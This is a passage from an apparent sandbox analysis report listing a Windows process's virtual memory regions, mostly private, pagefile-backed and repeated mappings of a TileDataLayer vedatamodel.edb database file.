"pagefile_0x0000008c73d10000" filename = "" Region: id = 15867 start_va = 0x8c73d20000 end_va = 0x8c73d2ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000008c73d20000" filename = "" Region: id = 15868 start_va = 0x8c73d30000 end_va = 0x8c73d3ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000008c73d30000" filename = "" Region: id = 15869 start_va = 0x8c73d40000 end_va = 0x8c73d40fff entry_point = 0x0 region_type = private name = "private_0x0000008c73d40000" filename = "" Region: id = 15870 start_va = 0x8c73d50000 end_va = 0x8c73d50fff entry_point = 0x0 region_type = private name = "private_0x0000008c73d50000" filename = "" Region: id = 15871 start_va = 0x8c73d60000 end_va = 0x8c73d66fff entry_point = 0x0 region_type = private name = "private_0x0000008c73d60000" filename = "" Region: id = 15872 start_va = 0x8c73d70000 end_va = 0x8c73d7ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000008c73d70000" filename = "" Region: id = 15873 start_va = 0x8c73d80000 end_va = 0x8c73d8ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000008c73d80000" filename = "" Region: id = 15874 start_va = 0x8c73d90000 end_va = 0x8c73d9ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000008c73d90000" filename = "" Region: id = 15875 start_va = 0x8c73da0000 end_va = 0x8c73daffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000008c73da0000" filename = "" Region: id = 15876 start_va = 0x8c73db0000 end_va = 0x8c73db0fff entry_point = 0x0 region_type = private name = "private_0x0000008c73db0000" filename = "" Region: id = 15877 start_va = 0x8c73dc0000 end_va = 0x8c73dc3fff entry_point = 0x0 region_type = private name = "private_0x0000008c73dc0000" filename = "" Region: id = 15878 start_va = 0x8c73dd0000 end_va = 0x8c73dd1fff entry_point = 0x0 region_type = private name = "private_0x0000008c73dd0000" filename = "" Region: id = 15879 start_va = 0x8c73de0000 end_va = 0x8c73de0fff entry_point = 0x0 region_type = private name = "private_0x0000008c73de0000" filename = "" Region: id = 15880 start_va = 0x8c73df0000 end_va = 0x8c73df0fff entry_point = 0x0 region_type = private name = "private_0x0000008c73df0000" filename = "" Region: id = 15881 start_va = 0x8c73e00000 end_va = 0x8c73efffff entry_point = 0x0 region_type = private name = "private_0x0000008c73e00000" filename = "" Region: id = 15882 start_va = 0x8c73f00000 end_va = 0x8c74087fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000008c73f00000" filename = "" Region: id = 15883 start_va = 0x8c74090000 end_va = 0x8c74210fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000008c74090000" filename = "" Region: id = 15884 start_va = 0x8c74220000 end_va = 0x8c742dffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000008c74220000" filename = "" Region: id = 15885 start_va = 0x8c742e0000 end_va = 0x8c743dffff entry_point = 0x0 region_type = private name = "private_0x0000008c742e0000" filename = "" Region: id = 15886 start_va = 0x8c743e0000 end_va = 0x8c744dffff entry_point = 0x0 region_type = private name = "private_0x0000008c743e0000" filename = "" Region: id = 15887 start_va = 0x8c744e0000 end_va = 0x8c74816fff entry_point = 0x8c744e0000 region_type = mapped_file name = "sortdefault.nls" filename = "\\Windows\\Globalization\\Sorting\\SortDefault.nls" (normalized: "c:\\windows\\globalization\\sorting\\sortdefault.nls") Region: id = 15888 start_va = 0x8c74a20000 end_va = 0x8c74b1ffff entry_point = 0x0 region_type = private name = "private_0x0000008c74a20000" filename = "" Region: id = 15889 start_va = 0x8c74b20000 end_va = 0x8c74c1ffff entry_point = 0x0 region_type = private name = "private_0x0000008c74b20000" filename = "" Region: id = 15890 start_va = 0x8c74c20000 end_va = 0x8c75c1ffff entry_point = 0x0 region_type = private name = "private_0x0000008c74c20000" filename = "" Region: id = 15891 start_va = 0x8c75c20000 end_va = 0x8c75c3ffff entry_point = 0x0 region_type = private name = "private_0x0000008c75c20000" filename = "" Region: id = 15892 start_va = 0x8c75c40000 end_va = 0x8c75c4ffff entry_point = 0x8c75c40000 region_type = mapped_file name = "vedatamodel.edb" filename = "\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\TileDataLayer\\Database\\vedatamodel.edb" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\tiledatalayer\\database\\vedatamodel.edb") Region: id = 15893 start_va = 0x8c75c50000 end_va = 0x8c75c5ffff entry_point = 0x8c75c50000 region_type = mapped_file name = "vedatamodel.edb" filename = "\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\TileDataLayer\\Database\\vedatamodel.edb" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\tiledatalayer\\database\\vedatamodel.edb") Region: id = 15894 start_va = 0x8c75c60000 end_va = 0x8c75c6ffff entry_point = 0x8c75c60000 region_type = mapped_file name = "vedatamodel.edb" filename = "\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\TileDataLayer\\Database\\vedatamodel.edb" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\tiledatalayer\\database\\vedatamodel.edb") Region: id = 15895 start_va = 0x8c75c70000 end_va = 0x8c75c7ffff entry_point = 0x8c75c70000 region_type = mapped_file name = "vedatamodel.edb" filename = "\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\TileDataLayer\\Database\\vedatamodel.edb" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\tiledatalayer\\database\\vedatamodel.edb") Region: id = 15896 start_va = 0x8c75c80000 end_va = 0x8c75c8ffff entry_point = 0x8c75c80000 region_type = mapped_file name = "vedatamodel.edb" filename = "\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\TileDataLayer\\Database\\vedatamodel.edb" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\tiledatalayer\\database\\vedatamodel.edb") Region: id = 15897 start_va = 0x8c75c90000 end_va = 0x8c75c9ffff entry_point = 0x8c75c90000 region_type = mapped_file name = "vedatamodel.edb" filename = "\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\TileDataLayer\\Database\\vedatamodel.edb" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\tiledatalayer\\database\\vedatamodel.edb") Region: id = 15898 start_va = 0x8c75ca0000 end_va = 0x8c75caffff entry_point = 0x8c75ca0000 region_type = mapped_file name = "vedatamodel.edb" filename = "\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\TileDataLayer\\Database\\vedatamodel.edb" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\tiledatalayer\\database\\vedatamodel.edb") Region: id = 15899 start_va = 0x8c75cb0000 end_va = 0x8c75cbffff entry_point = 0x8c75cb0000 region_type = mapped_file name = "vedatamodel.edb" filename = "\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\TileDataLayer\\Database\\vedatamodel.edb" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\tiledatalayer\\database\\vedatamodel.edb") Region: id = 15900 start_va = 0x8c75cc0000 end_va = 0x8c75ccffff entry_point = 0x8c75cc0000 region_type = mapped_file name = "vedatamodel.edb" filename = "\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\TileDataLayer\\Database\\vedatamodel.edb" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\tiledatalayer\\database\\vedatamodel.edb") Region: id = 15901 start_va = 0x8c75cd0000 end_va = 0x8c75cdffff entry_point = 0x8c75cd0000 region_type = mapped_file name = "vedatamodel.edb" filename = "\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\TileDataLayer\\Database\\vedatamodel.edb" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\tiledatalayer\\database\\vedatamodel.edb") Region: id = 15902 start_va = 0x8c75ce0000 end_va = 0x8c75ceffff entry_point = 0x8c75ce0000 region_type = mapped_file name = "vedatamodel.edb" filename = "\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\TileDataLayer\\Database\\vedatamodel.edb" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\tiledatalayer\\database\\vedatamodel.edb") Region: id = 15903 start_va = 0x8c75cf0000 end_va = 0x8c75cfffff entry_point = 0x8c75cf0000 region_type = mapped_file name = "vedatamodel.edb" filename = "\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\TileDataLayer\\Database\\vedatamodel.edb" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\tiledatalayer\\database\\vedatamodel.edb") Region: id = 15904 start_va = 0x8c75d00000 end_va = 0x8c75d0ffff entry_point = 0x8c75d00000 region_type = mapped_file name = "vedatamodel.edb" filename = "\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\TileDataLayer\\Database\\vedatamodel.edb" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\tiledatalayer\\database\\vedatamodel.edb") Region: id = 15905 start_va = 0x8c75d10000 end_va = 0x8c75d1ffff entry_point = 0x8c75d10000 region_type = mapped_file name = "vedatamodel.edb" filename = "\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\TileDataLayer\\Database\\vedatamodel.edb" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\tiledatalayer\\database\\vedatamodel.edb") Region: id = 15906 start_va = 0x8c75d20000 end_va = 0x8c75d2ffff entry_point = 0x8c75d20000 region_type = mapped_file name = "vedatamodel.edb" filename = "\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\TileDataLayer\\Database\\vedatamodel.edb" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\tiledatalayer\\database\\vedatamodel.edb") Region: id = 15907 start_va = 0x8c75d30000 end_va = 0x8c75daffff entry_point = 0x0 region_type = private name = "private_0x0000008c75d30000" filename = "" Region: id = 15908 start_va = 0x8c75db0000 end_va = 0x8c75dbffff entry_point = 0x8c75db0000 region_type = mapped_file name = "vedatamodel.edb" filename = "\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\TileDataLayer\\Database\\vedatamodel.edb" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\tiledatalayer\\database\\vedatamodel.edb") Region: id = 15909 start_va = 0x8c75dc0000 end_va = 0x8c75dc0fff entry_point = 0x0 region_type = private name = "private_0x0000008c75dc0000" filename = "" Region: id = 15910 start_va = 0x8c75dd0000 end_va = 0x8c75ddffff entry_point = 0x8c75dd0000 region_type = mapped_file name = "vedatamodel.edb" filename = "\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\TileDataLayer\\Database\\vedatamodel.edb" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\tiledatalayer\\database\\vedatamodel.edb") Region: id = 15911 start_va = 0x8c75de0000 end_va = 0x8c75deffff entry_point = 0x8c75de0000 region_type = mapped_file name = "vedatamodel.edb" filename = "\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\TileDataLayer\\Database\\vedatamodel.edb" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\tiledatalayer\\database\\vedatamodel.edb") Region: id = 15912 start_va = 0x8c75df0000 end_va = 0x8c75dfffff entry_point = 0x8c75df0000 region_type = mapped_file name = "vedatamodel.edb" filename = "\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\TileDataLayer\\Database\\vedatamodel.edb" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\tiledatalayer\\database\\vedatamodel.edb") Region: id = 15913 start_va = 0x8c75e00000 end_va = 0x8c75e0ffff entry_point = 0x8c75e00000 region_type = mapped_file name = "vedatamodel.edb" filename = "\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\TileDataLayer\\Database\\vedatamodel.edb" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\tiledatalayer\\database\\vedatamodel.edb") Region: id = 15914 start_va = 0x8c75e10000 end_va = 0x8c75e1ffff entry_point = 0x8c75e10000 region_type = mapped_file name = "vedatamodel.edb" filename = "\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\TileDataLayer\\Database\\vedatamodel.edb" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\tiledatalayer\\database\\vedatamodel.edb") Region: id = 15915 start_va = 0x8c75e20000 end_va = 0x8c75e2ffff entry_point = 0x8c75e20000 region_type = mapped_file name = "vedatamodel.edb" filename = "\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\TileDataLayer\\Database\\vedatamodel.edb" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\tiledatalayer\\database\\vedatamodel.edb") Region: id = 15916 start_va = 0x8c75e30000 end_va = 0x8c75e3ffff entry_point = 0x8c75e30000 region_type = mapped_file name = "vedatamodel.edb" filename = "\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\TileDataLayer\\Database\\vedatamodel.edb" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\tiledatalayer\\database\\vedatamodel.edb") Region: id = 15917 start_va = 0x8c75e40000 end_va = 0x8c75e4ffff entry_point = 0x8c75e40000 region_type = mapped_file name = "vedatamodel.edb" filename = "\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\TileDataLayer\\Database\\vedatamodel.edb" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\tiledatalayer\\database\\vedatamodel.edb") Region: id = 15918 start_va = 0x8c75e50000 end_va = 0x8c75e5ffff entry_point = 0x8c75e50000 region_type = mapped_file name = "vedatamodel.edb" filename = "\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\TileDataLayer\\Database\\vedatamodel.edb" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\tiledatalayer\\database\\vedatamodel.edb") Region: id = 15919 start_va = 0x8c75e60000 end_va = 0x8c75e6ffff entry_point = 0x8c75e60000 region_type = mapped_file name = "vedatamodel.edb" filename = "\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\TileDataLayer\\Database\\vedatamodel.edb" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\tiledatalayer\\database\\vedatamodel.edb") Region: id = 15920 start_va = 0x8c75e70000 end_va = 0x8c75e7ffff entry_point = 0x8c75e70000 region_type = mapped_file name = "vedatamodel.edb" filename = "\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\TileDataLayer\\Database\\vedatamodel.edb" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\tiledatalayer\\database\\vedatamodel.edb") Region: id = 15921 start_va = 0x8c75e80000 end_va = 0x8c75e8ffff entry_point = 0x8c75e80000 region_type = mapped_file name = "vedatamodel.edb" filename = "\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\TileDataLayer\\Database\\vedatamodel.edb" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\tiledatalayer\\database\\vedatamodel.edb") Region: id = 15922 start_va = 0x8c75e90000 end_va = 0x8c75e9ffff entry_point = 0x8c75e90000 region_type = mapped_file name = "vedatamodel.edb" filename = "\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\TileDataLayer\\Database\\vedatamodel.edb" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\tiledatalayer\\database\\vedatamodel.edb") Region: id = 15923 start_va = 0x8c75ea0000 end_va = 0x8c75eaffff entry_point = 0x8c75ea0000 region_type = mapped_file name = "vedatamodel.edb" filename = "\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\TileDataLayer\\Database\\vedatamodel.edb" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\tiledatalayer\\database\\vedatamodel.edb") Region: id = 15924 start_va = 0x8c75eb0000 end_va = 0x8c75ebffff entry_point = 0x8c75eb0000 region_type = mapped_file name = "vedatamodel.edb" filename = "\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\TileDataLayer\\Database\\vedatamodel.edb" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\tiledatalayer\\database\\vedatamodel.edb") Region: id = 15925 start_va = 0x8c75ec0000 end_va = 0x8c75ecffff entry_point = 0x8c75ec0000 region_type = mapped_file name = "vedatamodel.edb" filename = "\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\TileDataLayer\\Database\\vedatamodel.edb" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\tiledatalayer\\database\\vedatamodel.edb") Region: id = 15926 start_va = 0x8c75ed0000 end_va = 0x8c75edffff entry_point = 0x8c75ed0000 region_type = mapped_file name = "vedatamodel.edb" filename = "\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\TileDataLayer\\Database\\vedatamodel.edb" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\tiledatalayer\\database\\vedatamodel.edb") Region: id = 15927 start_va = 0x8c75ee0000 end_va = 0x8c75eeffff entry_point = 0x8c75ee0000 region_type = mapped_file name = "vedatamodel.edb" filename = "\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\TileDataLayer\\Database\\vedatamodel.edb" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\tiledatalayer\\database\\vedatamodel.edb") Region: id = 15928 start_va = 0x8c75ef0000 end_va = 0x8c75efffff entry_point = 0x8c75ef0000 region_type = mapped_file name = "vedatamodel.edb" filename = "\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\TileDataLayer\\Database\\vedatamodel.edb" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\tiledatalayer\\database\\vedatamodel.edb") Region: id = 15929 start_va = 0x8c75f00000 end_va = 0x8c75f0ffff entry_point = 0x8c75f00000 region_type = mapped_file name = "vedatamodel.edb" filename = "\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\TileDataLayer\\Database\\vedatamodel.edb" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\tiledatalayer\\database\\vedatamodel.edb") Region: id = 15930 start_va = 0x8c75f10000 end_va = 0x8c75f1ffff entry_point = 0x8c75f10000 region_type = mapped_file name = "vedatamodel.edb" filename = "\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\TileDataLayer\\Database\\vedatamodel.edb" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\tiledatalayer\\database\\vedatamodel.edb") Region: id = 15931 start_va = 0x8c75f20000 end_va = 0x8c75f49fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000008c75f20000" filename = "" Region: id = 15932 start_va = 0x8c75f50000 end_va = 0x8c75f5ffff entry_point = 0x8c75f50000 region_type = mapped_file name = "vedatamodel.edb" filename = "\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\TileDataLayer\\Database\\vedatamodel.edb" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\tiledatalayer\\database\\vedatamodel.edb") Region: id = 15933 start_va = 0x8c75f60000 end_va = 0x8c75f6ffff entry_point = 0x8c75f60000 region_type = mapped_file name = "vedatamodel.edb" filename = "\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\TileDataLayer\\Database\\vedatamodel.edb" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\tiledatalayer\\database\\vedatamodel.edb") Region: id = 15934 start_va = 0x8c75f70000 end_va = 0x8c75f7ffff entry_point = 0x8c75f70000 region_type = mapped_file name = "vedatamodel.edb" filename = "\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\TileDataLayer\\Database\\vedatamodel.edb" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\tiledatalayer\\database\\vedatamodel.edb") Region: id = 15935 start_va = 0x8c75f80000 end_va = 0x8c75f8ffff entry_point = 0x8c75f80000 region_type = mapped_file name = "vedatamodel.edb" filename = "\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\TileDataLayer\\Database\\vedatamodel.edb" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\tiledatalayer\\database\\vedatamodel.edb") Region: id = 15936 start_va = 0x8c75f90000 end_va = 0x8c75f9ffff entry_point = 0x8c75f90000 region_type = mapped_file name = "vedatamodel.edb" filename = "\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\TileDataLayer\\Database\\vedatamodel.edb" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\tiledatalayer\\database\\vedatamodel.edb") Region: id = 15937 start_va = 0x8c75fa0000 end_va = 0x8c75faffff entry_point = 0x8c75fa0000 region_type = mapped_file name = "vedatamodel.edb" filename = "\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\TileDataLayer\\Database\\vedatamodel.edb" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\tiledatalayer\\database\\vedatamodel.edb") Region: id = 15938 start_va = 0x8c75fb0000 end_va = 0x8c75fbffff entry_point = 0x8c75fb0000 region_type = mapped_file name = "vedatamodel.edb" filename = "\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\TileDataLayer\\Database\\vedatamodel.edb" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\tiledatalayer\\database\\vedatamodel.edb") Region: id = 15939 start_va = 0x8c75fc0000 end_va = 0x8c75fcffff entry_point = 0x8c75fc0000 region_type = mapped_file name = "vedatamodel.edb" filename = "\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\TileDataLayer\\Database\\vedatamodel.edb" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\tiledatalayer\\database\\vedatamodel.edb") Region: id = 15940 start_va = 0x8c75fd0000 end_va = 0x8c75fdffff entry_point = 0x8c75fd0000 region_type = mapped_file name = "vedatamodel.edb" filename = "\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\TileDataLayer\\Database\\vedatamodel.edb" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\tiledatalayer\\database\\vedatamodel.edb") Region: id = 15941 start_va = 0x8c75fe0000 end_va = 0x8c75feffff entry_point = 0x8c75fe0000 region_type = mapped_file name = "vedatamodel.edb" filename = "\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\TileDataLayer\\Database\\vedatamodel.edb" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\tiledatalayer\\database\\vedatamodel.edb") Region: id = 15942 start_va = 0x8c75ff0000 end_va = 0x8c75ffffff entry_point = 0x8c75ff0000 region_type = mapped_file name = "vedatamodel.edb" filename = "\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\TileDataLayer\\Database\\vedatamodel.edb" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\tiledatalayer\\database\\vedatamodel.edb") Region: id = 15943 start_va = 0x8c76000000 end_va = 0x8c760fffff entry_point = 0x0 region_type = private name = "private_0x0000008c76000000" filename = "" Region: id = 15944 start_va = 0x8c76100000 end_va = 0x8c7610ffff entry_point = 0x8c76100000 region_type = mapped_file name = "vedatamodel.edb" filename = "\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\TileDataLayer\\Database\\vedatamodel.edb" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\tiledatalayer\\database\\vedatamodel.edb") Region: id = 15945 start_va = 0x8c76110000 end_va = 0x8c7611ffff entry_point = 0x8c76110000 region_type = mapped_file name = "vedatamodel.edb" filename = "\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\TileDataLayer\\Database\\vedatamodel.edb" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\tiledatalayer\\database\\vedatamodel.edb") Region: id = 15946 start_va = 0x8c76120000 end_va = 0x8c7612ffff entry_point = 0x8c76120000 region_type = mapped_file name = "vedatamodel.edb" filename = "\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\TileDataLayer\\Database\\vedatamodel.edb" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\tiledatalayer\\database\\vedatamodel.edb") Region: id = 15947 start_va = 0x8c76130000 end_va = 0x8c7613ffff entry_point = 0x8c76130000 region_type = mapped_file name = "vedatamodel.edb" filename = "\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\TileDataLayer\\Database\\vedatamodel.edb" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\tiledatalayer\\database\\vedatamodel.edb") Region: id = 15948 start_va = 0x8c76140000 end_va = 0x8c7614ffff entry_point = 0x8c76140000 region_type = mapped_file name = "vedatamodel.edb" filename = "\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\TileDataLayer\\Database\\vedatamodel.edb" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\tiledatalayer\\database\\vedatamodel.edb") Region: id = 15949 start_va = 0x8c76150000 end_va = 0x8c7615ffff entry_point = 0x8c76150000 region_type = mapped_file name = "vedatamodel.edb" filename = "\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\TileDataLayer\\Database\\vedatamodel.edb" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\tiledatalayer\\database\\vedatamodel.edb") Region: id = 15950 start_va = 0x8c76160000 end_va = 0x8c7616ffff entry_point = 0x8c76160000 region_type = mapped_file name = "vedatamodel.edb" filename = "\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\TileDataLayer\\Database\\vedatamodel.edb" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\tiledatalayer\\database\\vedatamodel.edb") Region: id = 15951 start_va = 0x8c76170000 end_va = 0x8c7617ffff entry_point = 0x8c76170000 region_type = mapped_file name = "vedatamodel.edb" filename = "\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\TileDataLayer\\Database\\vedatamodel.edb" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\tiledatalayer\\database\\vedatamodel.edb") Region: id = 15952 start_va = 0x8c76180000 end_va = 0x8c7618ffff entry_point = 0x8c76180000 region_type = mapped_file name = "vedatamodel.edb" filename = "\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\TileDataLayer\\Database\\vedatamodel.edb" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\tiledatalayer\\database\\vedatamodel.edb") Region: id = 15953 start_va = 0x8c76190000 end_va = 0x8c7619ffff entry_point = 0x8c76190000 region_type = mapped_file name = "vedatamodel.edb" filename = "\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\TileDataLayer\\Database\\vedatamodel.edb" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\tiledatalayer\\database\\vedatamodel.edb") Region: id = 15954 start_va = 0x8c761a0000 end_va = 0x8c761affff entry_point = 0x8c761a0000 region_type = mapped_file name = "vedatamodel.edb" filename = "\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\TileDataLayer\\Database\\vedatamodel.edb" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\tiledatalayer\\database\\vedatamodel.edb") Region: id = 15955 start_va = 0x8c761b0000 end_va = 0x8c761bffff entry_point = 0x8c761b0000 region_type = mapped_file name = "vedatamodel.edb" filename = "\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\TileDataLayer\\Database\\vedatamodel.edb" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\tiledatalayer\\database\\vedatamodel.edb") Region: id = 15956 start_va = 0x8c761c0000 end_va = 0x8c761cffff entry_point = 0x8c761c0000 region_type = mapped_file name = "vedatamodel.edb" filename = "\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\TileDataLayer\\Database\\vedatamodel.edb" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\tiledatalayer\\database\\vedatamodel.edb") Region: id = 15957 start_va = 0x8c761d0000 end_va = 0x8c761dffff entry_point = 0x8c761d0000 region_type = mapped_file name = "vedatamodel.edb" filename = "\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\TileDataLayer\\Database\\vedatamodel.edb" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\tiledatalayer\\database\\vedatamodel.edb") Region: id = 15958 start_va = 0x8c761e0000 end_va = 0x8c761effff entry_point = 0x8c761e0000 region_type = mapped_file name = "vedatamodel.edb" filename = "\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\TileDataLayer\\Database\\vedatamodel.edb" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\tiledatalayer\\database\\vedatamodel.edb") Region: id = 15959 start_va = 0x8c761f0000 end_va = 0x8c761fffff entry_point = 0x8c761f0000 region_type = mapped_file name = "vedatamodel.edb" filename = "\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\TileDataLayer\\Database\\vedatamodel.edb" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\tiledatalayer\\database\\vedatamodel.edb") Region: id = 15960 start_va = 0x8c76200000 end_va = 0x8c7620ffff entry_point = 0x8c76200000 region_type = mapped_file name = "vedatamodel.edb" filename = "\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\TileDataLayer\\Database\\vedatamodel.edb" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\tiledatalayer\\database\\vedatamodel.edb") Region: id = 15961 start_va = 0x8c76210000 end_va = 0x8c7621ffff entry_point = 0x8c76210000 region_type = mapped_file name = "vedatamodel.edb" filename = "\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\TileDataLayer\\Database\\vedatamodel.edb" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\tiledatalayer\\database\\vedatamodel.edb") Region: id = 15962 start_va = 0x8c76220000 end_va = 0x8c76220fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000008c76220000" filename = "" Region: id = 15963 start_va = 0x8c76230000 end_va = 0x8c7623ffff entry_point = 0x8c76230000 region_type = mapped_file name = "vedatamodel.edb" filename = "\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\TileDataLayer\\Database\\vedatamodel.edb" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\tiledatalayer\\database\\vedatamodel.edb") Region: id = 15964 start_va = 0x8c76240000 end_va = 0x8c7624ffff entry_point = 0x8c76240000 region_type = mapped_file name = 